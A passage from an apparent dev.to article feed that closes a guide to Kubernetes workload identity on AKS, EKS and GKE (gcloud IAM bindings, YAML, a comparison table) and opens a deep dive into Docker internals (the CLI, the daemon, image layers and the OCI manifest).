  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.objectViewer"&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create the IAM policy binding between the Kubernetes SA and GCP SA&lt;/span&gt;
gcloud iam service-accounts add-iam-policy-binding &lt;span class="se"&gt;\&lt;/span&gt;
  gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/iam.workloadIdentityUser"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:PROJECT_ID.svc.id.goog[default/gke-workload-identity-sa]"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Configuration Points:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Workload Identity Pool&lt;/strong&gt;: Format is &lt;code&gt;PROJECT_ID.svc.id.goog&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Member Binding&lt;/strong&gt;: Must match &lt;code&gt;serviceAccount:PROJECT_ID.svc.id.goog[&amp;lt;namespace&amp;gt;/&amp;lt;ksa-name&amp;gt;]&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Role&lt;/strong&gt;: The GCP service account needs &lt;code&gt;roles/iam.workloadIdentityUser&lt;/code&gt; for the K8s SA&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The member format breaks down as:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;PROJECT_ID.svc.id.goog&lt;/code&gt; - Your workload identity pool&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;[default/gke-workload-identity-sa]&lt;/code&gt; - &lt;code&gt;[namespace/kubernetes-service-account]&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  GKE Workload Identity Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;iam.gke.io/gcp-service-account&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-gsa@PROJECT_ID.iam.gserviceaccount.com&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-demo&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-workload-identity-sa&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;google/cloud-sdk:slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sleep"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;infinity"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="c1"&gt;# Note: GKE Workload Identity automatically configures the GCP metadata server&lt;/span&gt;
    &lt;span class="c1"&gt;# in the pod. Application Default Credentials (ADC) will automatically work&lt;/span&gt;
    &lt;span class="c1"&gt;# without needing explicit volume mounts or environment variables.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;How it works in GKE:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnsbrzcaf2lo3pl3jhb7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnsbrzcaf2lo3pl3jhb7.png" alt="gke" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on GKE and Projected Volumes&lt;/strong&gt;: Unlike AKS and EKS, GKE's Workload Identity primarily works through metadata server emulation. You can optionally use projected service account tokens with a specific audience if you need direct access to the Kubernetes token, but this is rarely necessary. Most applications using Google Cloud client libraries will authenticate automatically through the metadata server without any explicit volume configuration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cloud Provider Comparison
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Trust Relationship Overview
&lt;/h3&gt;

&lt;p&gt;All three cloud providers use a similar pattern: establishing trust between the Kubernetes service account and cloud provider IAM system through OIDC federation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltupeo875hidg9m3ivta.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltupeo875hidg9m3ivta.png" alt="trust relationship overview" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Provider-Specific Comparison
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9lyj69hgodcj8h57tk6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj9lyj69hgodcj8h57tk6.png" alt="product specific comparison" width="800" height="527"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;AKS&lt;/th&gt;
&lt;th&gt;EKS&lt;/th&gt;
&lt;th&gt;GKE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Trust Mechanism&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Federated Identity Credential&lt;/td&gt;
&lt;td&gt;IAM OIDC Provider + Trust Policy&lt;/td&gt;
&lt;td&gt;Workload Identity Pool Binding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Subject Format&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;system:serviceaccount:ns:sa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;system:serviceaccount:ns:sa&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;serviceAccount:PROJECT.svc.id.goog[ns/sa]&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://iam.googleapis.com/...&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;K8s Annotation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;azure.workload.identity/client-id&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;eks.amazonaws.com/role-arn&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;iam.gke.io/gcp-service-account&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pod Label Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;azure.workload.identity/use: "true"&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Auto-Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (via webhook)&lt;/td&gt;
&lt;td&gt;Yes (via webhook)&lt;/td&gt;
&lt;td&gt;Yes (metadata server)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Env Variables Injected&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AZURE_CLIENT_ID&lt;/code&gt;, &lt;code&gt;AZURE_TENANT_ID&lt;/code&gt;, etc.&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AWS_ROLE_ARN&lt;/code&gt;, &lt;code&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;None (uses metadata server)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Volume Auto-Mount&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Typically not needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloud IAM Setup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Federated credential on App/MI&lt;/td&gt;
&lt;td&gt;IAM Role with trust policy&lt;/td&gt;
&lt;td&gt;IAM binding with workloadIdentityUser&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Key Benefits Across All Platforms
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;No Long-Lived Credentials&lt;/strong&gt;: Tokens expire automatically, reducing security risk&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Rotation&lt;/strong&gt;: The kubelet handles token refresh transparently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fine-Grained Access&lt;/strong&gt;: Audience scoping limits token usage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud Integration&lt;/strong&gt;: Seamless authentication to cloud provider services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Least Privilege&lt;/strong&gt;: Each pod gets only the permissions it needs&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Best Practices
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Set appropriate expiration times&lt;/strong&gt;: Balance between security (shorter) and performance (fewer rotations)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use specific audiences&lt;/strong&gt;: Scope tokens to their intended use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor token usage&lt;/strong&gt;: Track authentication patterns for security insights&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Follow cloud provider guides&lt;/strong&gt;: Each platform has specific setup requirements&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test token rotation&lt;/strong&gt;: Ensure your applications handle token refresh gracefully&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Projected service account tokens represent a significant security improvement in Kubernetes authentication. Whether you're running on AKS, EKS, or GKE, understanding how these tokens work enables you to build secure, cloud-native applications that follow the principle of least privilege without managing long-lived credentials.&lt;/p&gt;

&lt;p&gt;The integration with cloud provider IAM systems makes projected tokens essential for modern Kubernetes workloads, providing a secure bridge between your containerized applications and cloud services.&lt;/p&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>eks</category>
      <category>gke</category>
      <category>aks</category>
    </item>
    <item>
      <title>How Docker Actually Works: A Deep Dive into the Internals</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Thu, 05 Feb 2026 03:54:13 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/how-docker-actually-works-a-deep-dive-into-the-internals-501d</link>
      <guid>https://dev.to/piyushjajoo/how-docker-actually-works-a-deep-dive-into-the-internals-501d</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Most developers treat Docker as a black box — you write a Dockerfile, run &lt;code&gt;docker up&lt;/code&gt;, and things just work. But what's actually happening under the hood? This post tears the curtain back and walks through every layer: from the CLI all the way down to Linux kernel primitives that make isolation possible.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Big Picture&lt;/li&gt;
&lt;li&gt;The Docker CLI and Client&lt;/li&gt;
&lt;li&gt;The Docker Daemon (dockerd)&lt;/li&gt;
&lt;li&gt;Images: Layered Filesystems&lt;/li&gt;
&lt;li&gt;The Container Runtime: containerd and runc&lt;/li&gt;
&lt;li&gt;Linux Namespaces: Isolation&lt;/li&gt;
&lt;li&gt;cgroups: Resource Control&lt;/li&gt;
&lt;li&gt;Union Filesystems and Storage Drivers&lt;/li&gt;
&lt;li&gt;Networking Internals&lt;/li&gt;
&lt;li&gt;The Full Lifecycle: Start to Finish&lt;/li&gt;
&lt;li&gt;Security Surface and Attack Vectors&lt;/li&gt;
&lt;li&gt;Docker vs. Podman vs. nerdctl vs. Kata Containers&lt;/li&gt;
&lt;li&gt;Summary and Key Takeaways&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  1. The Big Picture
&lt;/h2&gt;

&lt;p&gt;Before we descend into internals, it helps to have a map. Docker is not a single program — it's a stack of cooperating components. Each layer has a distinct job.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fitwq8rtxlf6j4jdbn01e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fitwq8rtxlf6j4jdbn01e.png" alt="big picture" width="800" height="688"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;docker run&lt;/code&gt; command you've ever typed travels through this entire stack. Let's walk it top to bottom.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. The Docker CLI and Client
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;docker&lt;/code&gt; command you type in your terminal is just a &lt;strong&gt;client&lt;/strong&gt;. It does almost nothing by itself — it serializes your intent into REST API calls and forwards them to the daemon.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8z7xntbo0ppuqie7irh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8z7xntbo0ppuqie7irh.png" alt="The Docker CLI and Client" width="800" height="504"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key facts about the CLI:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Communication happens over a &lt;strong&gt;Unix domain socket&lt;/strong&gt; (&lt;code&gt;/var/run/docker.sock&lt;/code&gt;), not TCP, for local interactions. This is why Docker commands feel instantaneous — there's no network round-trip.&lt;/li&gt;
&lt;li&gt;The CLI speaks the &lt;strong&gt;Docker Engine API&lt;/strong&gt; (a versioned REST API). You can call it directly with &lt;code&gt;curl&lt;/code&gt; if you want: &lt;code&gt;curl --unix-socket /var/run/docker.sock http://localhost/images/json&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The CLI is &lt;strong&gt;open source and replaceable&lt;/strong&gt;. Tools like Podman, Buildx, and Docker Compose are all just different clients talking to compatible backends.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  3. The Docker Daemon (dockerd)
&lt;/h2&gt;

&lt;p&gt;The daemon is the &lt;strong&gt;brain&lt;/strong&gt;. It's a long-running background process that manages the entire lifecycle of containers, images, volumes, and networks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihyocmj15l4ygfds2y1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fihyocmj15l4ygfds2y1l.png" alt="dockerd" width="800" height="327"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The daemon doesn't actually &lt;em&gt;run&lt;/em&gt; containers itself anymore. That's a critical architectural decision made in 2017 — Docker extracted the container runtime into &lt;strong&gt;containerd&lt;/strong&gt; (see Section 5). The daemon now acts as an orchestrator sitting above containerd, handling the higher-level logic like image pulls, build context, log streaming, and networking setup.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Images: Layered Filesystems
&lt;/h2&gt;

&lt;p&gt;A Docker image is &lt;strong&gt;not&lt;/strong&gt; a single monolithic file. It's a stack of read-only &lt;strong&gt;layers&lt;/strong&gt;, each representing a single filesystem change made by a Dockerfile instruction. This is the foundation of Docker's efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 How Layers Are Built
&lt;/h3&gt;

&lt;p&gt;Each instruction in a Dockerfile that modifies the filesystem creates a new layer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="s"&gt; ubuntu:22.04          # Layer 0: Base image (multiple layers itself)&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update         &lt;span class="c"&gt;# Layer 1: Updated package index&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; nginx  &lt;span class="c"&gt;# Layer 2: Nginx binaries + deps&lt;/span&gt;
&lt;span class="k"&gt;COPY&lt;/span&gt;&lt;span class="s"&gt; ./app /opt/app        # Layer 3: Your application code&lt;/span&gt;
&lt;span class="k"&gt;CMD&lt;/span&gt;&lt;span class="s"&gt; ["nginx", "-g", "daemon off;"]  # Metadata only — no new layer&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc6zzsobilz7qd6yl48cf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc6zzsobilz7qd6yl48cf.png" alt="layers" width="756" height="2048"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Layer Sharing and The Content-Addressable Store
&lt;/h3&gt;

&lt;p&gt;Every layer is identified by its &lt;strong&gt;SHA-256 hash&lt;/strong&gt; of its contents. This gives Docker two powerful properties:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Deduplication:&lt;/strong&gt; If two images share the same &lt;code&gt;ubuntu:22.04&lt;/code&gt; base, the layers on disk are stored only &lt;strong&gt;once&lt;/strong&gt;. The hash is the same, so Docker knows they're identical.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Shared caching:&lt;/strong&gt; When you rebuild an image and only change Layer 3, Docker reuses Layers 0–2 from cache. It only needs to rebuild from the point of change.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywesevmc3iqk15xh7a9b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywesevmc3iqk15xh7a9b.png" alt="shared caching" width="800" height="229"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Notice how &lt;code&gt;v1&lt;/code&gt; and &lt;code&gt;v2&lt;/code&gt; share the first three layers (ubuntu base, apt-get update, nginx install). Only the final layer differs (app v1 vs. app v2). This is why &lt;code&gt;docker pull&lt;/code&gt; is so fast for incremental updates — it only fetches the delta.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.3 The OCI Image Manifest
&lt;/h3&gt;

&lt;p&gt;When you pull an image, what actually comes over the wire is an &lt;strong&gt;OCI Image Manifest&lt;/strong&gt; — a JSON document that lists all the layers, their hashes, and the image config:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"schemaVersion"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.manifest.v1+json"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.config.v1+json"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:aaa..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;7023&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"layers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:abc1..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;73400320&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"mediaType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"application/vnd.oci.image.layer.v1.tar+gzip"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sha256:def2..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"size"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;15728640&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
